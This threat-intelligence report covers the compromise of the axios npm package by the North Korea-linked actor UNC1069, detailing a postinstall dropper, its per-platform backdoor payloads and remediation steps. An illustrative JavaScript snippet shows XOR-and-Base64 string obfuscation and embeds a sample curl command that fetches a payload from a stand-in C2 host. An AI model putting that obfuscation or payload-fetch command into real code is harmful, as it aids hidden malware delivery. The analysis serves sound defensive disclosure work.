North Korea-Linked UNC1069 Compromises Axios npm Package in Supply Chain Attack
Mandiant has identified a supply chain attack on the widely used Axios npm package, with North Korea-nexus threat actor UNC1069 injecting malicious code that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.

Google Threat Intelligence Group (GTIG) has disclosed an active software supply chain attack targeting the popular npm (Node Package Manager) package 'axios'. Between 00:21 and 03:20 UTC on March 31, 2026, an attacker published axios versions 1.14.1 and 0.30.4 that declared a new malicious dependency named 'plain-crypto-js'. Axios is one of the most widely used JavaScript HTTP client libraries; its 1.x and 0.x release lines typically see over 100 million and 83 million weekly downloads, respectively. The malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor on Windows, macOS, and Linux.
GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at least 2018. The attribution rests on the use of WAVESHAPER.V2, an updated version of the WAVESHAPER backdoor previously used by this actor, and on overlaps between the infrastructure artifacts seen in this attack and infrastructure UNC1069 used in past operations. The maintainer account associated with the axios package was compromised; its email address had been changed to an attacker-controlled account (ifstap@proton.me).
The threat actor used the postinstall hook in the malicious dependency's package.json to achieve silent execution: when npm installs a compromised axios release, it resolves plain-crypto-js and, as part of that package's install lifecycle, runs an obfuscated JavaScript dropper named 'setup.js' without any action from the user. The plain-crypto-js package itself is only the delivery vehicle. The core component is the dropper GTIG tracks as SILKBELL (setup.js, SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), which identifies the host operating system at run time and delivers a platform-specific payload.
The script conceals the command-and-control (C2) URL and the per-OS execution commands with a custom XOR-and-Base64 string obfuscation routine. To evade static analysis, it resolves fs, os, and execSync (from child_process) at run time rather than through top-level requires, so a scanner looking for those imports at the head of the file sees nothing. After dropping the second-stage payload, setup.js attempts to delete itself and restore the modified package.json, removing the postinstall hook that would otherwise reveal how it ran.
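To make the string-hiding concrete, the following is an added illustration of the general technique (repeating-key XOR followed by Base64) and of how an analyst recovers the hidden strings. It is not SILKBELL's routine and not code from the original report: the key byte, the encoding order, the hypothetical dropper fragment and the C2 hostname (c2.example.invalid) are all constructed for the demo.

```javascript
'use strict';

// XOR a byte buffer with a repeating key; the same function encodes and decodes.
function xorBytes(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key[i % key.length];
  return out;
}

// Build-time side (what a malware author runs): plaintext -> XOR -> Base64 literal.
function obfuscate(plain, key) {
  return xorBytes(Buffer.from(plain, 'utf8'), Buffer.from(key, 'utf8')).toString('base64');
}

// Run-time side: what a dropper does to recover a string, and what an analyst
// re-implements once the key is known.
function deobfuscate(blob, key) {
  return xorBytes(Buffer.from(blob, 'base64'), Buffer.from(key, 'utf8')).toString('utf8');
}

// Analyst helper 1: pull candidate Base64 literals (16+ chars) out of dropper source text.
function extractBase64Literals(source, minLen = 16) {
  const re = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
  const out = [];
  let m;
  while ((m = re.exec(source)) !== null) if (m[1].length >= minLen) out.push(m[1]);
  return out;
}

// Analyst helper 2: if the key is a single byte, try all 256 and keep the
// decodings that are fully printable and look like a URL or a shell command.
function bruteForceSingleByteKey(blob) {
  const raw = Buffer.from(blob, 'base64');
  const hits = [];
  for (let k = 0; k < 256; k++) {
    const text = xorBytes(raw, Buffer.from([k])).toString('latin1');
    if (/^[\x20-\x7e]+$/.test(text) && /(https?:\/\/|\bcurl\b|\bbash\b|powershell)/i.test(text)) {
      hits.push({ key: k, text });
    }
  }
  return hits;
}

// Constructed dropper fragment (assumption: single-byte key 'Q'; not the real setup.js).
const SAMPLE_KEY = 'Q';
const SAMPLE_C2 = 'http://c2.example.invalid:8000/';
const SAMPLE_CMD = 'curl -fsSL http://c2.example.invalid:8000/ld.py -o /tmp/ld.py';
const SAMPLE_SOURCE = `
const a = "${obfuscate(SAMPLE_C2, SAMPLE_KEY)}";
const b = "${obfuscate(SAMPLE_CMD, SAMPLE_KEY)}";
const c = "short";
`;

// Recover every hidden string in the fragment, both by brute force (key unknown)
// and directly (key already extracted from the script's decode routine).
function decodeSampleDropper() {
  return extractBase64Literals(SAMPLE_SOURCE).map(blob => ({
    blob,
    brute: bruteForceSingleByteKey(blob),
    known: deobfuscate(blob, SAMPLE_KEY),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(decodeSampleDropper(), null, 2));
}
```

In real triage the key and the exact transform come from reading the dropper's own decode function; the brute-force helper is for the common single-byte case, and a multi-byte key needs the routine itself.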
Depending on the identified platform, the dropper runs a different routine. On Windows, it locates the native powershell.exe binary, copies it to evade detection, and downloads a PowerShell script with curl. On macOS, it uses bash and curl to download a native Mach-O payload to /Library/Caches/com.apple.act.mond. On Linux, it downloads a Python backdoor to /tmp/ld.py. Each of these payloads is a variant of the backdoor GTIG tracks as WAVESHAPER.V2. The macOS variant is written in C++; it collects system information, enumerates directories, executes additional payloads, and takes its C2 address from command-line arguments.
GTIG also identified WAVESHAPER.V2 variants written in PowerShell and Python, matching the Windows and Linux payloads described above. Regardless of operating system, the implant beacons to the C2 endpoint over port 8000 every 60 seconds, sending Base64-encoded JSON with a hard-coded User-Agent header. After the initial beacon it polls in a loop, sleeping 60 seconds between requests, and the server's response determines its next action; supported commands include 'kill', which terminates the implant, and 'rundir', which returns a detailed directory listing.
This attack underscores the persistent threat to the open-source software supply chain, particularly through widely used packages like Axios. Organizations that resolved axios 1.14.1 or 0.30.4 should treat the hosts that installed them as potentially compromised rather than simply upgrading: check lockfiles and node_modules for plain-crypto-js, look for the dropped files (/tmp/ld.py on Linux, /Library/Caches/com.apple.act.mond on macOS) and for outbound connections to port 8000 recurring at 60-second intervals, and rotate any credentials and tokens reachable from affected developer or build machines. Because setup.js deletes itself and reverts package.json, the absence of the dropper on disk is not evidence that it never ran; the lockfile entry and the installer's execution of a lifecycle script are the more durable traces. Move to an axios release outside the affected versions, and consider installing with npm's --ignore-scripts option in CI so that third-party postinstall hooks cannot execute (packages that genuinely need a native build step will then require an explicit, reviewed rebuild). The involvement of a North Korea-nexus actor highlights the geopolitical dimension of such attacks, where financially motivated groups leverage supply chain access for espionage and credential theft.